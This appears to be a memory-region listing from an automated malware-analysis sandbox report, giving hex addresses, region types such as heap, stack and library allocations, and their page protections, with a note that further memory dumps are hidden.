heap
|
page read and write
|
||
855B000
|
trusted library allocation
|
page read and write
|
||
1B470CA9000
|
heap
|
page read and write
|
||
1DEA205C000
|
heap
|
page read and write
|
||
1B46EF40000
|
heap
|
page read and write
|
||
1B470B21000
|
heap
|
page read and write
|
||
1B46ED79000
|
heap
|
page read and write
|
||
311D000
|
trusted library allocation
|
page execute and read and write
|
||
1DE89B78000
|
trusted library allocation
|
page read and write
|
||
1B470B6F000
|
heap
|
page read and write
|
||
1B470C53000
|
heap
|
page read and write
|
||
3560000
|
heap
|
page read and write
|
||
1B470CA9000
|
heap
|
page read and write
|
||
1B470D21000
|
heap
|
page read and write
|
||
1B46ED99000
|
heap
|
page read and write
|
||
1B46EBD0000
|
heap
|
page read and write
|
||
7670000
|
heap
|
page read and write
|
||
1B46EEA0000
|
remote allocation
|
page read and write
|
||
1B470CF9000
|
heap
|
page read and write
|
||
1B831FF000
|
stack
|
page read and write
|
||
1B470CA5000
|
heap
|
page read and write
|
||
1B470C80000
|
heap
|
page read and write
|
||
1DE87F10000
|
heap
|
page read and write
|
||
1DE89945000
|
heap
|
page read and write
|
||
7FFE7DFC6000
|
trusted library allocation
|
page execute and read and write
|
||
1DE99971000
|
trusted library allocation
|
page read and write
|
||
79F0000
|
trusted library allocation
|
page read and write
|
||
1B470B28000
|
heap
|
page read and write
|
||
1B470CE3000
|
heap
|
page read and write
|
||
4D5E000
|
stack
|
page read and write
|
||
1B46EDE9000
|
heap
|
page read and write
|
||
1B46EE1F000
|
heap
|
page read and write
|
||
1DE99960000
|
trusted library allocation
|
page read and write
|
||
1B470B23000
|
heap
|
page read and write
|
||
4134CFF000
|
unknown
|
page read and write
|
||
1B470B27000
|
heap
|
page read and write
|
||
1B470C72000
|
heap
|
page read and write
|
||
1B470B23000
|
heap
|
page read and write
|
||
85ED000
|
heap
|
page read and write
|
||
1B470B26000
|
heap
|
page read and write
|
||
7258000
|
trusted library allocation
|
page read and write
|
||
1B46EF48000
|
heap
|
page read and write
|
||
75DE000
|
stack
|
page read and write
|
||
4134C7B000
|
stack
|
page read and write
|
||
1DE899D5000
|
trusted library allocation
|
page read and write
|
||
1DE99951000
|
trusted library allocation
|
page read and write
|
||
7FFE7E0F0000
|
trusted library allocation
|
page read and write
|
||
7250000
|
trusted library allocation
|
page read and write
|
||
1B470C38000
|
heap
|
page read and write
|
||
1B470CA5000
|
heap
|
page read and write
|
||
1B470CA5000
|
heap
|
page read and write
|
||
7DF4E7210000
|
trusted library allocation
|
page execute and read and write
|
||
1B46EE62000
|
heap
|
page read and write
|
||
85BB000
|
heap
|
page read and write
|
||
9270A88000
|
stack
|
page read and write
|
||
1DEA1F03000
|
heap
|
page read and write
|
||
926FD38000
|
stack
|
page read and write
|
||
3550000
|
trusted library allocation
|
page read and write
|
||
1B470CD1000
|
heap
|
page read and write
|
||
1B470B4A000
|
heap
|
page read and write
|
||
326C000
|
stack
|
page read and write
|
||
7FFE7E0D0000
|
trusted library allocation
|
page execute and read and write
|
||
926FDBC000
|
stack
|
page read and write
|
||
8430000
|
trusted library allocation
|
page read and write
|
||
8530000
|
trusted library allocation
|
page read and write
|
||
1DE8AD57000
|
trusted library allocation
|
page read and write
|
||
1B470CA9000
|
heap
|
page read and write
|
||
1B470C72000
|
heap
|
page read and write
|
||
926F9FC000
|
stack
|
page read and write
|
||
79D0000
|
trusted library allocation
|
page read and write
|
||
1DE8A4E1000
|
trusted library allocation
|
page read and write
|
||
1B470CBF000
|
heap
|
page read and write
|
||
1B470B6F000
|
heap
|
page read and write
|
||
1B470CA9000
|
heap
|
page read and write
|
||
1DE87D50000
|
heap
|
page read and write
|
||
1DE89810000
|
trusted library allocation
|
page read and write
|
||
8570000
|
heap
|
page read and write
|
||
1B470C72000
|
heap
|
page read and write
|
||
7FFE7E170000
|
trusted library allocation
|
page read and write
|
||
1B470C72000
|
heap
|
page read and write
|
||
1B470C80000
|
heap
|
page read and write
|
||
9270C0B000
|
stack
|
page read and write
|
||
8B30000
|
trusted library allocation
|
page execute and read and write
|
||
3110000
|
trusted library allocation
|
page read and write
|
||
4DD2000
|
trusted library allocation
|
page read and write
|
||
1B470B24000
|
heap
|
page read and write
|
||
1B470C46000
|
heap
|
page read and write
|
||
926F5F3000
|
stack
|
page read and write
|
||
BC8000
|
stack
|
page read and write
|
||
926F97E000
|
stack
|
page read and write
|
||
1B832FE000
|
stack
|
page read and write
|
||
1B470C21000
|
heap
|
page read and write
|
||
8AE0000
|
direct allocation
|
page read and write
|
||
1B46EE01000
|
heap
|
page read and write
|
||
1DE87EF0000
|
trusted library allocation
|
page read and write
|
||
4C4E000
|
stack
|
page read and write
|
||
5D71000
|
trusted library allocation
|
page read and write
|
||
7FFE7E1D0000
|
trusted library allocation
|
page read and write
|
||
1DEA2168000
|
heap
|
page read and write
|
||
926FAFE000
|
stack
|
page read and write
|
||
926FCB6000
|
stack
|
page read and write
|
||
1B46EF48000
|
heap
|
page read and write
|
||
1DE8B2AE000
|
trusted library allocation
|
page read and write
|
||
8580000
|
heap
|
page read and write
|
||
1DE8B218000
|
trusted library allocation
|
page read and write
|
||
1A59FF40000
|
heap
|
page read and write
|
||
1B470CA5000
|
heap
|
page read and write
|
||
1B470C57000
|
heap
|
page read and write
|
||
3300000
|
heap
|
page read and write
|
||
1DEA1957000
|
heap
|
page read and write
|
||
1B470C78000
|
heap
|
page read and write
|
||
1B470C78000
|
heap
|
page read and write
|
||
1B46EDFF000
|
heap
|
page read and write
|
||
926FB7E000
|
stack
|
page read and write
|
||
8805000
|
trusted library allocation
|
page read and write
|
||
1DEA20CB000
|
heap
|
page read and write
|
||
1DEA20D3000
|
heap
|
page read and write
|
||
84AE000
|
stack
|
page read and write
|
||
3140000
|
trusted library allocation
|
page read and write
|
||
3142000
|
trusted library allocation
|
page read and write
|
||
1B470C80000
|
heap
|
page read and write
|
||
1B470C3B000
|
heap
|
page read and write
|
||
1B470B37000
|
heap
|
page read and write
|
||
7960000
|
trusted library allocation
|
page read and write
|
||
7FFE7DEE2000
|
trusted library allocation
|
page read and write
|
||
84EE000
|
stack
|
page read and write
|
||
1B46EF48000
|
heap
|
page read and write
|
||
1DE89FA7000
|
trusted library allocation
|
page read and write
|
||
1DEA2142000
|
heap
|
page read and write
|
||
1B46ECB0000
|
heap
|
page read and write
|
||
1B470B53000
|
heap
|
page read and write
|
||
1B470CA5000
|
heap
|
page read and write
|
||
1B46EF48000
|
heap
|
page read and write
|
||
926FE3E000
|
stack
|
page read and write
|
||
1B470B28000
|
heap
|
page read and write
|
||
1B470D45000
|
heap
|
page read and write
|
||
1DEA2164000
|
heap
|
page read and write
|
||
3188000
|
heap
|
page read and write
|
||
1DE8B7E7000
|
trusted library allocation
|
page read and write
|
||
1B470B20000
|
heap
|
page read and write
|
||
926FBF8000
|
stack
|
page read and write
|
||
1DE89DD8000
|
trusted library allocation
|
page read and write
|
||
1B470DF4000
|
heap
|
page read and write
|
||
1B46EE01000
|
heap
|
page read and write
|
||
5D99000
|
trusted library allocation
|
page read and write
|
||
7A9C000
|
stack
|
page read and write
|
||
1B470C49000
|
heap
|
page read and write
|
||
1DE89DCD000
|
trusted library allocation
|
page read and write
|
||
32F4000
|
heap
|
page read and write
|
||
1B470C57000
|
heap
|
page read and write
|
||
7FFE7E270000
|
trusted library allocation
|
page read and write
|
||
1DEA2151000
|
heap
|
page read and write
|
||
1DEA215B000
|
heap
|
page read and write
|
||
320F000
|
stack
|
page read and write
|
||
7FFE7E000000
|
trusted library allocation
|
page execute and read and write
|
||
1B46ED9F000
|
heap
|
page read and write
|
||
1B470CE6000
|
heap
|
page read and write
|
||
1B470B4A000
|
heap
|
page read and write
|
||
1B46ED70000
|
heap
|
page read and write
|
||
8A00000
|
trusted library allocation
|
page read and write
|
||
4D71000
|
trusted library allocation
|
page read and write
|
||
1B470C46000
|
heap
|
page read and write
|
||
1DE87F76000
|
heap
|
page read and write
|
||
3356000
|
heap
|
page read and write
|
||
1B470B28000
|
heap
|
page read and write
|
||
32AE000
|
stack
|
page read and write
|
||
7FFE7E1C0000
|
trusted library allocation
|
page read and write
|
||
3129000
|
trusted library allocation
|
page read and write
|
||
3363000
|
heap
|
page read and write
|
||
1B470C38000
|
heap
|
page read and write
|
||
8790000
|
trusted library allocation
|
page read and write
|
||
30F0000
|
trusted library section
|
page read and write
|
||
926FC3F000
|
stack
|
page read and write
|
||
1DE87F00000
|
heap
|
page execute and read and write
|
||
1B470D70000
|
heap
|
page read and write
|
||
7F310000
|
trusted library allocation
|
page execute and read and write
|
||
7FFE7E120000
|
trusted library allocation
|
page read and write
|
||
7FFE7DFA0000
|
trusted library allocation
|
page execute and read and write
|
||
4CD0000
|
heap
|
page read and write
|
||
7FFE7E210000
|
trusted library allocation
|
page read and write
|
||
7680000
|
heap
|
page read and write
|
||
89F0000
|
trusted library allocation
|
page execute and read and write
|
||
926FFBE000
|
stack
|
page read and write
|
||
7A30000
|
trusted library allocation
|
page read and write
|
||
7850000
|
heap
|
page execute and read and write
|
||
73B0000
|
heap
|
page read and write
|
||
1B46EDDC000
|
heap
|
page read and write
|
||
1B470B21000
|
heap
|
page read and write
|
||
1B470CD5000
|
heap
|
page read and write
|
||
789E000
|
stack
|
page read and write
|
||
1B46ED9A000
|
heap
|
page read and write
|
||
1B470C72000
|
heap
|
page read and write
|
||
1B82AFE000
|
stack
|
page read and write
|
||
1DE8B6E2000
|
trusted library allocation
|
page read and write
|
||
1B46EDA0000
|
heap
|
page read and write
|
||
1DE898D0000
|
heap
|
page read and write
|
||
1B470C53000
|
heap
|
page read and write
|
||
9FEB000
|
direct allocation
|
page execute and read and write
|
||
7FFE7DEED000
|
trusted library allocation
|
page execute and read and write
|
||
8586000
|
heap
|
page read and write
|
||
1B470B53000
|
heap
|
page read and write
|
||
1B470CD6000
|
heap
|
page read and write
|
||
1B46EE53000
|
heap
|
page read and write
|
||
1B46EE0E000
|
heap
|
page read and write
|
||
1B46EDA0000
|
heap
|
page read and write
|
||
1DE89920000
|
heap
|
page execute and read and write
|
||
E40000
|
heap
|
page read and write
|
||
1DE8B705000
|
trusted library allocation
|
page read and write
|
||
1B46EDAF000
|
heap
|
page read and write
|
||
1B470C78000
|
heap
|
page read and write
|
||
7FFE7DEF0000
|
trusted library allocation
|
page read and write
|
||
1DEA2154000
|
heap
|
page read and write
|
||
8588000
|
heap
|
page read and write
|
||
1B470B53000
|
heap
|
page read and write
|
||
7FFE7E1A0000
|
trusted library allocation
|
page read and write
|
||
1B470C57000
|
heap
|
page read and write
|
||
1B470C57000
|
heap
|
page read and write
|
||
8540000
|
trusted library allocation
|
page read and write
|
||
1B470DF6000
|
heap
|
page read and write
|
||
79E0000
|
trusted library allocation
|
page read and write
|
||
7FFE7DEE0000
|
trusted library allocation
|
page read and write
|
||
1DE8B6D1000
|
trusted library allocation
|
page read and write
|
||
7FFE7E100000
|
trusted library allocation
|
page read and write
|
||
1B46EF45000
|
heap
|
page read and write
|
||
1B470CEE000
|
heap
|
page read and write
|
||
3334000
|
heap
|
page read and write
|
||
1DE89DE5000
|
trusted library allocation
|
page read and write
|
||
1B470B2B000
|
heap
|
page read and write
|
||
7970000
|
trusted library allocation
|
page execute and read and write
|
||
1DE87F5C000
|
heap
|
page read and write
|
||
8550000
|
trusted library allocation
|
page read and write
|
||
3218000
|
trusted library allocation
|
page read and write
|
||
1DE87FA3000
|
heap
|
page read and write
|
||
1B470C48000
|
heap
|
page read and write
|
||
1DE89940000
|
heap
|
page read and write
|
||
1B470C51000
|
heap
|
page read and write
|
||
1B470C95000
|
heap
|
page read and write
|
||
1B46EDBC000
|
heap
|
page read and write
|
||
894C000
|
stack
|
page read and write
|
||
32B0000
|
trusted library allocation
|
page execute and read and write
|
||
1DEA1E47000
|
heap
|
page execute and read and write
|
||
1DE87F55000
|
heap
|
page read and write
|
||
7FFE7E1E0000
|
trusted library allocation
|
page read and write
|
||
79C0000
|
trusted library allocation
|
page read and write
|
||
1B470B53000
|
heap
|
page read and write
|
||
1B470CC2000
|
heap
|
page read and write
|
||
7FFE7DEFB000
|
trusted library allocation
|
page read and write
|
||
1B46EEA0000
|
remote allocation
|
page read and write
|
||
1DE881B0000
|
trusted library allocation
|
page read and write
|
||
1B470B2E000
|
heap
|
page read and write
|
||
795D000
|
stack
|
page read and write
|
||
4CC0000
|
heap
|
page execute and read and write
|
||
1B470C40000
|
heap
|
page read and write
|
||
8520000
|
trusted library allocation
|
page read and write
|
||
1DE8B6E4000
|
trusted library allocation
|
page read and write
|
||
1B470C95000
|
heap
|
page read and write
|
||
1DE87FEB000
|
heap
|
page read and write
|
||
1B470B2F000
|
heap
|
page read and write
|
||
1B470C57000
|
heap
|
page read and write
|
||
1DEA1E6E000
|
heap
|
page read and write
|
||
3160000
|
trusted library allocation
|
page read and write
|
||
1A59FF45000
|
heap
|
page read and write
|
||
85BF000
|
heap
|
page read and write
|
||
73CB000
|
heap
|
page read and write
|
||
1B470CA5000
|
heap
|
page read and write
|
||
7FFE7DEE3000
|
trusted library allocation
|
page execute and read and write
|
||
3336000
|
heap
|
page read and write
|
||
1B46EDC9000
|
heap
|
page read and write
|
||
926F87E000
|
stack
|
page read and write
|
||
926FA7E000
|
stack
|
page read and write
|
||
1B46EE62000
|
heap
|
page read and write
|
||
5338000
|
trusted library allocation
|
page read and write
|
||
1B470C80000
|
heap
|
page read and write
|
||
1B46EE60000
|
heap
|
page read and write
|
||
1DEA1F70000
|
heap
|
page read and write
|
||
1DEA20C6000
|
heap
|
page read and write
|
||
1B82FFB000
|
stack
|
page read and write
|
||
1B470C20000
|
heap
|
page read and write
|
||
1B470CA5000
|
heap
|
page read and write
|
||
1B46EED0000
|
heap
|
page read and write
|
||
30C0000
|
heap
|
page read and write
|
||
1DE8B300000
|
trusted library allocation
|
page read and write
|
||
7FFE7E0A0000
|
trusted library allocation
|
page execute and read and write
|
||
1B470CC7000
|
heap
|
page read and write
|
||
B8C000
|
stack
|
page read and write
|
||
1B470B27000
|
heap
|
page read and write
|
||
1B470D9E000
|
heap
|
page read and write
|
||
7FFE7E130000
|
trusted library allocation
|
page read and write
|
||
890C000
|
stack
|
page read and write
|
||
1DEA1F2F000
|
heap
|
page read and write
|
||
84F0000
|
trusted library allocation
|
page execute and read and write
|
||
1B470B53000
|
heap
|
page read and write
|
||
7990000
|
trusted library allocation
|
page read and write
|
||
1B470D9F000
|
heap
|
page read and write
|
||
1B470CF9000
|
heap
|
page read and write
|
||
1DEA212E000
|
heap
|
page read and write
|
||
1B46EE10000
|
heap
|
page read and write
|
||
1B470CD7000
|
heap
|
page read and write
|
||
1B46EE53000
|
heap
|
page read and write
|
||
76B3000
|
heap
|
page read and write
|
||
1B470C95000
|
heap
|
page read and write
|
||
7A40000
|
trusted library allocation
|
page execute and read and write
|
||
4C0F000
|
stack
|
page read and write
|
||
1B470C95000
|
heap
|
page read and write
|
||
7FFE7E240000
|
trusted library allocation
|
page read and write
|
||
1B470CC4000
|
heap
|
page read and write
|
||
79B0000
|
trusted library allocation
|
page read and write
|
||
1B46EDFF000
|
heap
|
page read and write
|
||
4BCE000
|
stack
|
page read and write
|
||
4D68000
|
heap
|
page read and write
|
||
76CA000
|
heap
|
page read and write
|
||
1B470C57000
|
heap
|
page read and write
|
||
1B46EE27000
|
heap
|
page read and write
|
||
3113000
|
trusted library allocation
|
page execute and read and write
|
||
1DE8A4CD000
|
trusted library allocation
|
page read and write
|
||
1B470CA9000
|
heap
|
page read and write
|
||
1B470C51000
|
heap
|
page read and write
|
||
4134D7F000
|
stack
|
page read and write
|
||
30E0000
|
trusted library section
|
page read and write
|
||
7FFE7E190000
|
trusted library allocation
|
page read and write
|
||
1DE87FDE000
|
heap
|
page read and write
|
||
761F000
|
stack
|
page read and write
|
||
1B470CD0000
|
heap
|
page read and write
|
||
1B470C72000
|
heap
|
page read and write
|
||
78DE000
|
stack
|
page read and write
|
||
1B470C95000
|
heap
|
page read and write
|
||
1B470CA9000
|
heap
|
page read and write
|
||
7A50000
|
trusted library allocation
|
page read and write
|
||
1B470D70000
|
heap
|
page read and write
|
||
1A59FC50000
|
heap
|
page read and write
|
||
4C8E000
|
stack
|
page read and write
|
||
1A59FC66000
|
heap
|
page read and write
|
||
1DE8A2C9000
|
trusted library allocation
|
page read and write
|
||
926F8FE000
|
stack
|
page read and write
|
||
3145000
|
trusted library allocation
|
page execute and read and write
|
||
7265000
|
heap
|
page execute and read and write
|
||
1DEA1EA6000
|
heap
|
page read and write
|
||
1DE881C0000
|
heap
|
page read and write
|
||
1DE8A4F7000
|
trusted library allocation
|
page read and write
|
||
1DE87ED0000
|
trusted library allocation
|
page read and write
|
||
1B46EE32000
|
heap
|
page read and write
|
||
1DEA2050000
|
heap
|
page read and write
|
||
1B82DFF000
|
stack
|
page read and write
|
||
1B470C57000
|
heap
|
page read and write
|
||
1B470B2F000
|
heap
|
page read and write
|
||
9270A0F000
|
stack
|
page read and write
|
||
1DE87E50000
|
heap
|
page read and write
|
||
7FFE7DEE4000
|
trusted library allocation
|
page read and write
|
||
1DEA1E40000
|
heap
|
page execute and read and write
|
||
1B470C53000
|
heap
|
page read and write
|
||
1B470C72000
|
heap
|
page read and write
|
||
1DE87F1D000
|
heap
|
page read and write
|
||
1B46EE62000
|
heap
|
page read and write
|
||
1B46ECD0000
|
heap
|
page read and write
|
||
1B470CB2000
|
heap
|
page read and write
|
||
7FFE7E0C7000
|
trusted library allocation
|
page read and write
|
||
85B3000
|
heap
|
page read and write
|
||
1DE99C47000
|
trusted library allocation
|
page read and write
|
||
31CE000
|
stack
|
page read and write
|
||
8500000
|
heap
|
page read and write
|
||
1A59FE40000
|
heap
|
page read and write
|
||
1B46EEA0000
|
remote allocation
|
page read and write
|
||
1A59FC59000
|
heap
|
page read and write
|
||
1B470CA5000
|
heap
|
page read and write
|
||
1B470C93000
|
heap
|
page read and write
|
||
7FFE7E160000
|
trusted library allocation
|
page read and write
|
||
1DE8B6F0000
|
trusted library allocation
|
page read and write
|
||
7FFE7DF96000
|
trusted library allocation
|
page read and write
|
||
5DD6000
|
trusted library allocation
|
page read and write
|
||
7A20000
|
trusted library allocation
|
page read and write
|
||
1DE87E90000
|
heap
|
page read and write
|
||
1B470C78000
|
heap
|
page read and write
|
||
8770000
|
trusted library allocation
|
page read and write
|
||
1B470DF0000
|
heap
|
page read and write
|
||
1B470CD0000
|
heap
|
page read and write
|
||
1B470CA9000
|
heap
|
page read and write
|
||
1B470CA9000
|
heap
|
page read and write
|
||
F60000
|
heap
|
page read and write
|
||
1B470C3E000
|
heap
|
page read and write
|
||
1B470B53000
|
heap
|
page read and write
|
||
1B470B53000
|
heap
|
page read and write
|
||
79A0000
|
trusted library allocation
|
page read and write
|
||
1B470CF0000
|
heap
|
page read and write
|
||
1B470CD3000
|
heap
|
page read and write
|
||
1B470CB9000
|
heap
|
page read and write
|
||
1DE8B246000
|
trusted library allocation
|
page read and write
|
||
1B470CB2000
|
heap
|
page read and write
|
||
1B46EE0A000
|
heap
|
page read and write
|
There are 525 additional memdumps that are hidden and not shown in this listing.